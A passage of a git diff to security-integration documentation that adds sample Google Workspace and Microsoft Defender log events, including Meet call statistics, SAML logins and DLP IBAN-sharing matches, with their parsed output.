"PRODUCT_ID", + "value": "0x2" + }, + { + "name": "PRODUCT_NAME", + "value": "2.0 root hub" + }, + { + "name": "VENDOR_ID", + "value": "0x1ddd" + }, + { + "name": "VENDOR_NAME", + "value": "Linux Foundation" + } + ] + } + ] + } + ``` + + + +=== "test_chrome_sample_2" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-08T13:20:40.000Z", + "uniqueQualifier": "-2392455694764444444444", + "applicationName": "chrome", + "customerId": "C01x7c000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\"", + "actor": { + "callerType": "USER", + "profileId": "105250506097973333333333" + }, + "events": [ + { + "type": "CHROME_OS_LOGIN_LOGOUT_TYPE", + "name": "CHROME_OS_LOGIN_EVENT", + "parameters": [ + { + "name": "TIMESTAMP", + "intValue": "1731072040000" + }, + { + "name": "EVENT_REASON", + "value": "CHROMEOS_KIOSK_SESSION_LOGIN" + }, + { + "name": "DEVICE_NAME", + "value": "S5NXNZ00A000000" + }, + { + "name": "DEVICE_USER", + "value": "-" + }, + { + "name": "CLIENT_TYPE", + "value": "CHROME_OS_DEVICE" + }, + { + "name": "DEVICE_PLATFORM", + "value": "ChromeOS 16033.51.0" + }, + { + "name": "DIRECTORY_DEVICE_ID", + "value": "4ebc77ae-ce6b-4857" + }, + { + "name": "ORG_UNIT_NAME", + "value": "test_org" + } + ] + } + ] + } + ``` + + + === "test_drive_sample" @@ -719,58 +922,22 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_groups_entre_sample1" - - - ```json - { - "kind": "admin#reports#activity", - "id": { - "time": "2024-03-11T15:20:33.157Z", - "uniqueQualifier": "-92180609786", - "applicationName": "groups_enterprise", - "customerId": "C03foh000" - }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", - "actor": { - "callerType": "USER", - "email": "joe.done@test.com", - "profileId": "109472445" - }, - "events": [ - { - "type": "moderator_action", - "name": "delete_group", - "parameters": [ - { - "name": "group_id", - "value": "testgroup@test.com" - } - ] - } - ] - } - ``` - - - -=== "test_meet_sample1" +=== "test_end_call" ```json { "kind": "admin#reports#activity", "id": { - "time": "2024-03-13T11:02:40.037Z", - "uniqueQualifier": "235176017661", + "time": "2024-11-14T12:07:37.366Z", + "uniqueQualifier": "-3853857772415670247", "applicationName": "meet", - "customerId": "C03foh000" + "customerId": "C030x4pai" }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\"", "actor": { - "callerType": "USER", - "email": "jone.doe@test.com", - "profileId": "1098488062555" + "callerType": "KEY", + "key": "HANGOUTS_EXTERNAL_OR_ANONYMOUS" }, "events": [ { @@ -779,7 +946,11 @@ In this section, you will find examples of raw logs as generated natively by the "parameters": [ { "name": "video_send_seconds", - "intValue": "0" + "intValue": "173" + }, + { + "name": "screencast_recv_bitrate_kbps_mean", + "intValue": "61" }, { "name": "location_country", @@ -787,43 +958,59 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "identifier_type", - "value": "email_address" + "value": "device_id" + }, + { + "name": "audio_send_bitrate_kbps_mean", + "intValue": "0" + }, + { + "name": "video_send_packet_loss_max", + "intValue": "2" }, { "name": "endpoint_id", - "value": "dSzi5ZfqD8I" + "value": "boq_hlane_QGKxiQcCZvF" }, { "name": "device_type", - "value": "web" + "value": "meet_hardware" }, { - "name": "screencast_send_packet_loss_mean", + "name": "video_send_packet_loss_mean", "intValue": "0" }, + { + "name": "screencast_recv_long_side_median_pixels", + "intValue": "1568" + }, { "name": "calendar_event_id", - "value": "glb41ldt739tcf0bun7p9htaqr" + "value": "3ckjqg60dq5j4eu9cgjtdb396c" }, { "name": "screencast_send_seconds", - "intValue": "83" + "intValue": "0" }, { - "name": "screencast_send_short_side_median_pixels", - "intValue": "1080" + "name": "video_send_fps_mean", + "intValue": "30" }, { - "name": "screencast_send_packet_loss_max", + "name": "audio_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "network_send_jitter_msec_mean", "intValue": "1" }, { - "name": "screencast_send_fps_mean", + "name": "screencast_recv_fps_mean", "intValue": "29" }, { "name": "audio_recv_seconds", - "intValue": "0" + "intValue": "33" }, { "name": "network_congestion", @@ -831,7 +1018,11 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "network_estimated_download_kbps_mean", - "intValue": "1" + "intValue": "74" + }, + { + "name": "audio_send_packet_loss_mean", + "intValue": "0" }, { "name": "network_transport_protocol", @@ -839,55 +1030,87 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "duration_seconds", - "intValue": "1498" + "intValue": "15317" + }, + { + "name": "video_send_bitrate_kbps_mean", + "intValue": "19" }, { "name": "identifier", - "value": "jone.doe@test.com" + "value": "644e7990-c69d-4e09-8cd2-6ae52406c21c" }, { "name": "location_region", - "value": "Argenteuil" + "value": "Paris" }, { - "name": "screencast_send_bitrate_kbps_mean", - "intValue": "791" + "name": "audio_recv_packet_loss_max", + "intValue": "0" + }, + { + "name": "audio_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_recv_jitter_msec_max", + "intValue": "2" }, { "name": "organizer_email", - "value": "joe.done@test.com" + "value": "tt.test@test.fr" + }, + { + "name": "screencast_recv_short_side_median_pixels", + "intValue": "980" + }, + { + "name": "is_external", + "boolValue": false + }, + { + "name": "network_recv_jitter_msec_mean", + "intValue": "1" }, { "name": "ip_address", - "value": "5555:333:333:5555:5555:5555:5555:5555" + "value": "1.2.3.4" }, { "name": "audio_send_seconds", - "intValue": "0" + "intValue": "15316" }, { "name": "display_name", - "value": "Test SEGLA" + "value": "OLYMPUS (Paris-106T, 8)" }, { - "name": "video_recv_seconds", + "name": "screencast_recv_packet_loss_max", "intValue": "0" }, { - "name": "screencast_send_long_side_median_pixels", - "intValue": "1920" + "name": "video_recv_seconds", + "intValue": "0" }, { "name": "network_rtt_msec_mean", - "intValue": "12" + "intValue": "8" + }, + { + "name": "video_send_long_side_median_pixels", + "intValue": "320" + }, + { + "name": "screencast_recv_packet_loss_mean", + "intValue": "0" }, { "name": "conference_id", - "value": "SQEGZkIp70zCVuvX_PtXDxI" + "value": "rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA" }, { "name": "screencast_recv_seconds", - "intValue": "0" + "intValue": "14874" }, { "name": "product_type", @@ -895,15 +1118,15 @@ In this section, you will find examples of raw logs as generated natively by the }, { "name": "network_estimated_upload_kbps_mean", - "intValue": "0" + "intValue": "7" }, { - "name": "meeting_code", - "value": "GMGSZDDDDD" + "name": "video_send_short_side_median_pixels", + "intValue": "180" }, { - "name": "is_external", - "boolValue": false + "name": "meeting_code", + "value": "ABCDEFGHIJ" } ] } @@ -913,36 +1136,420 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_meet_sample2" +=== "test_end_call_no_ip" ```json { "kind": "admin#reports#activity", "id": { - "time": "2024-03-13T10:31:23.630Z", - "uniqueQualifier": "47501654195", + "time": "2024-11-14T11:32:12.301Z", + "uniqueQualifier": "-6765941919309710661", "applicationName": "meet", - "customerId": "C03foh000" + "customerId": "C030x4pai" }, - "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\"", "actor": { - "callerType": "USER", - "email": "jone.done@test.com", - "profileId": "1070981817756" + "callerType": "KEY", + "key": "HANGOUTS_EXTERNAL_OR_ANONYMOUS" }, "events": [ { - "type": "conference_action", - "name": "presentation_started", + "type": "call", + "name": "call_ended", "parameters": [ { - "name": "is_external", - "boolValue": false + "name": "video_send_seconds", + "intValue": "725" }, { - "name": "meeting_code", - "value": "BWXXZYNUUU" + "name": "audio_send_bitrate_kbps_mean", + "intValue": "13" + }, + { + "name": "video_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "endpoint_id", + "value": "boq_hlane_UJtqXZcvBo3" + }, + { + "name": "device_type", + "value": "web" + }, + { + "name": "video_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "video_recv_long_side_median_pixels", + "intValue": "480" + }, + { + "name": "calendar_event_id", + "value": "6cm94j8lp55a9880oj2o0rb3e6" + }, + { + "name": "screencast_send_seconds", + "intValue": "0" + }, + { + "name": "video_send_fps_mean", + "intValue": "30" + }, + { + "name": "audio_send_packet_loss_max", + "intValue": "0" + }, + { + "name": "video_recv_short_side_median_pixels", + "intValue": "270" + }, + { + "name": "video_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_send_jitter_msec_mean", + "intValue": "1" + }, + { + "name": "audio_recv_seconds", + "intValue": "3647" + }, + { + "name": "network_congestion", + "intValue": "0" + }, + { + "name": "network_estimated_download_kbps_mean", + "intValue": "1158" + }, + { + "name": "audio_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_transport_protocol", + "value": "tcp" + }, + { + "name": "duration_seconds", + "intValue": "3651" + }, + { + "name": "video_send_bitrate_kbps_mean", + "intValue": "375" + }, + { + "name": "audio_recv_packet_loss_max", + "intValue": "9" + }, + { + "name": "video_recv_fps_mean", + "intValue": "23" + }, + { + "name": "audio_recv_packet_loss_mean", + "intValue": "0" + }, + { + "name": "network_recv_jitter_msec_max", + "intValue": "98" + }, + { + "name": "organizer_email", + "value": "tt.test@test.fr" + }, + { + "name": "is_external", + "boolValue": true + }, + { + "name": "network_recv_jitter_msec_mean", + "intValue": "3" + }, + { + "name": "audio_send_seconds", + "intValue": "3647" + }, + { + "name": "display_name", + "value": "Yuki" + }, + { + "name": "video_recv_seconds", + "intValue": "3638" + }, + { + "name": "network_rtt_msec_mean", + "intValue": "11" + }, + { + "name": "video_send_long_side_median_pixels", + "intValue": "480" + }, + { + "name": "conference_id", + "value": "aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA" + }, + { + "name": "screencast_recv_seconds", + "intValue": "3627" + }, + { + "name": "product_type", + "value": "meet" + }, + { + "name": "network_estimated_upload_kbps_mean", + "intValue": "105" + }, + { + "name": "video_send_short_side_median_pixels", + "intValue": "270" + }, + { + "name": "video_recv_packet_loss_max", + "intValue": "0" + }, + { + "name": "meeting_code", + "value": "BUSOHGFTVB" + } + ] + } + ] + } + ``` + + + +=== "test_groups_entre_sample1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-11T15:20:33.157Z", + "uniqueQualifier": "-92180609786", + "applicationName": "groups_enterprise", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "actor": { + "callerType": "USER", + "email": "joe.done@test.com", + "profileId": "109472445" + }, + "events": [ + { + "type": "moderator_action", + "name": "delete_group", + "parameters": [ + { + "name": "group_id", + "value": "testgroup@test.com" + } + ] + } + ] + } + ``` + + + +=== "test_meet_sample1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-13T11:02:40.037Z", + "uniqueQualifier": "235176017661", + "applicationName": "meet", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "actor": { + "callerType": "USER", + "email": "jone.doe@test.com", + "profileId": "1098488062555" + }, + "events": [ + { + "type": "call", + "name": "call_ended", + "parameters": [ + { + "name": "video_send_seconds", + "intValue": "0" + }, + { + "name": "location_country", + "value": "FR" + }, + { + "name": "identifier_type", + "value": "email_address" + }, + { + "name": "endpoint_id", + "value": "dSzi5ZfqD8I" + }, + { + "name": "device_type", + "value": "web" + }, + { + "name": "screencast_send_packet_loss_mean", + "intValue": "0" + }, + { + "name": "calendar_event_id", + "value": "glb41ldt739tcf0bun7p9htaqr" + }, + { + "name": "screencast_send_seconds", + "intValue": "83" + }, + { + "name": "screencast_send_short_side_median_pixels", + "intValue": "1080" + }, + { + "name": "screencast_send_packet_loss_max", + "intValue": "1" + }, + { + "name": "screencast_send_fps_mean", + "intValue": "29" + }, + { + "name": "audio_recv_seconds", + "intValue": "0" + }, + { + "name": "network_congestion", + "intValue": "0" + }, + { + "name": "network_estimated_download_kbps_mean", + "intValue": "1" + }, + { + "name": "network_transport_protocol", + "value": "udp" + }, + { + "name": "duration_seconds", + "intValue": "1498" + }, + { + "name": "identifier", + "value": "jone.doe@test.com" + }, + { + "name": "location_region", + "value": "Argenteuil" + }, + { + "name": "screencast_send_bitrate_kbps_mean", + "intValue": "791" + }, + { + "name": "organizer_email", + "value": "joe.done@test.com" + }, + { + "name": "ip_address", + "value": "5555:333:333:5555:5555:5555:5555:5555" + }, + { + "name": "audio_send_seconds", + "intValue": "0" + }, + { + "name": "display_name", + "value": "Test SEGLA" + }, + { + "name": "video_recv_seconds", + "intValue": "0" + }, + { + "name": "screencast_send_long_side_median_pixels", + "intValue": "1920" + }, + { + "name": "network_rtt_msec_mean", + "intValue": "12" + }, + { + "name": "conference_id", + "value": "SQEGZkIp70zCVuvX_PtXDxI" + }, + { + "name": "screencast_recv_seconds", + "intValue": "0" + }, + { + "name": "product_type", + "value": "meet" + }, + { + "name": "network_estimated_upload_kbps_mean", + "intValue": "0" + }, + { + "name": "meeting_code", + "value": "GMGSZDDDDD" + }, + { + "name": "is_external", + "boolValue": false + } + ] + } + ] + } + ``` + + + +=== "test_meet_sample2" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-03-13T10:31:23.630Z", + "uniqueQualifier": "47501654195", + "applicationName": "meet", + "customerId": "C03foh000" + }, + "etag": "\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL\"", + "actor": { + "callerType": "USER", + "email": "jone.done@test.com", + "profileId": "1070981817756" + }, + "events": [ + { + "type": "conference_action", + "name": "presentation_started", + "parameters": [ + { + "name": "is_external", + "boolValue": false + }, + { + "name": "meeting_code", + "value": "BWXXZYNUUU" }, { "name": "conference_id", @@ -968,6 +1575,324 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_rules_sample_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:21:46.270Z", + "uniqueQualifier": "233165468629800000000", + "applicationName": "rules", + "customerId": "C02i38888" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": "john.doe@test.com", + "profileId": "113328670183616666666" + }, + "events": [ + { + "type": "action_complete_type", + "name": "action_complete", + "parameters": [ + { + "name": "data_source", + "value": "DRIVE" + }, + { + "name": "resource_id", + "value": "1K23Am8JmHL9vgGwUjUPaq0000000" + }, + { + "name": "resource_owner_email", + "value": "john.doe@test.com" + }, + { + "name": "rule_resource_name", + "value": "policies/aka00000000000" + }, + { + "name": "rule_name", + "value": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN" + }, + { + "name": "rule_type", + "value": "DLP" + }, + { + "name": "matched_detectors", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "detector_id", + "value": "IBAN_CODE" + }, + { + "name": "detector_type", + "value": "PREDEFINED_DLP" + }, + { + "name": "display_name", + "value": "IBAN_CODE" + } + ] + } + ] + }, + { + "name": "triggered_actions", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "action_type", + "value": "DRIVE_WARN_ON_EXTERNAL_SHARING" + } + ] + } + ] + }, + { + "name": "resource_recipients", + "multiValue": [ + "john.doe@test.com" + ] + }, + { + "name": "scan_type", + "value": "DRIVE_ONLINE_SCAN" + }, + { + "name": "matched_trigger", + "value": "DRIVE_SHARE" + }, + { + "name": "severity", + "value": "LOW" + }, + { + "name": "resource_type", + "value": "DOCUMENT" + }, + { + "name": "resource_title", + "value": "8157822-2024-11-7-15-21-0" + } + ] + } + ] + } + ``` + + + +=== "test_rules_sample_2" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:21:46.270Z", + "uniqueQualifier": "-49907177521610000000", + "applicationName": "rules", + "customerId": "C02i38888" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\"", + "actor": { + "email": "john.doe@test.com", + "profileId": "11332867018361686666666" + }, + "events": [ + { + "type": "content_matched_type", + "name": "content_matched", + "parameters": [ + { + "name": "data_source", + "value": "DRIVE" + }, + { + "name": "resource_id", + "value": "1K23Am8JmHL9vgGwUjUPaqDZV" + }, + { + "name": "resource_owner_email", + "value": "john.doe@test.com" + }, + { + "name": "rule_resource_name", + "value": "policies/aka000000000" + }, + { + "name": "rule_name", + "value": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN" + }, + { + "name": "rule_type", + "value": "DLP" + }, + { + "name": "matched_detectors", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "detector_id", + "value": "IBAN_CODE" + }, + { + "name": "detector_type", + "value": "PREDEFINED_DLP" + }, + { + "name": "display_name", + "value": "IBAN_CODE" + } + ] + } + ] + }, + { + "name": "triggered_actions", + "multiMessageValue": [ + { + "parameter": [ + { + "name": "action_type", + "value": "DRIVE_WARN_ON_EXTERNAL_SHARING" + } + ] + } + ] + }, + { + "name": "resource_recipients", + "multiValue": [ + "john.doe@test.com" + ] + }, + { + "name": "scan_type", + "value": "DRIVE_ONLINE_SCAN" + }, + { + "name": "severity", + "value": "LOW" + }, + { + "name": "resource_type", + "value": "DOCUMENT" + }, + { + "name": "resource_title", + "value": "8157822-2024-11-7-15-21-0" + } + ] + } + ] + } + ``` + + + +=== "test_saml_login_success" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:26:15.515Z", + "uniqueQualifier": "4091348940000000", + "applicationName": "saml", + "customerId": "C00000000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": "John.doe@test.com", + "profileId": "10344515534360000000" + }, + "ipAddress": "2.1.3.2", + "events": [ + { + "type": "login", + "name": "login_success", + "parameters": [ + { + "name": "orgunit_path", + "value": "/test/implementation" + }, + { + "name": "initiated_by", + "value": "sp" + }, + { + "name": "application_name", + "value": "AWS" + }, + { + "name": "saml_status_code", + "value": "SUCCESS_URI" + } + ] + } + ] + } + ``` + + + +=== "test_saml_login_success_1" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-11-07T14:24:58.191Z", + "uniqueQualifier": "-318965716033600000", + "applicationName": "saml", + "customerId": "C000000000" + }, + "etag": "\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\"", + "actor": { + "email": "John.doe@test.com", + "profileId": "113844576558700000000" + }, + "ipAddress": "8.6.15.1", + "events": [ + { + "type": "login", + "name": "login_success", + "parameters": [ + { + "name": "orgunit_path", + "value": "/test/dev" + }, + { + "name": "initiated_by", + "value": "sp" + }, + { + "name": "application_name", + "value": "AWS Client VPN" + }, + { + "name": "saml_status_code", + "value": "SUCCESS_URI" + } + ] + } + ] + } + ``` + + + === "test_suspend_user" diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md index 4dacb4fa8..304cfe59f 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md @@ -639,6 +639,66 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_cloud_app4.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } + + ``` + + === "test_connection_acknowledged.json" ```json @@ -763,61 +823,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "test_deivce_events_2.json" - - ```json - - { - "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in 